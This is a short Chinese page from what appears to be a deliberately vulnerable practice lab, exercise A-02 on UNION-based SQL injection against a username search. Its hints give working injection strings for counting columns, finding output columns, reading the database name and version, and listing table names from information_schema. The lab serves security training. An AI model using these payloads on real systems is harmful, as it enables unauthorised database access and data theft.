A-02 联合查询注入

故意设计的安全漏洞

🔍 按用户名搜索

💡 提示

先确定列数: ?username=' ORDER BY 5-- 联合查询: ?username=' UNION SELECT 1,2,3,4-- 提取数据库: ?username=' UNION SELECT 1,database(),version(),4-- 提取表名: ?username=' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--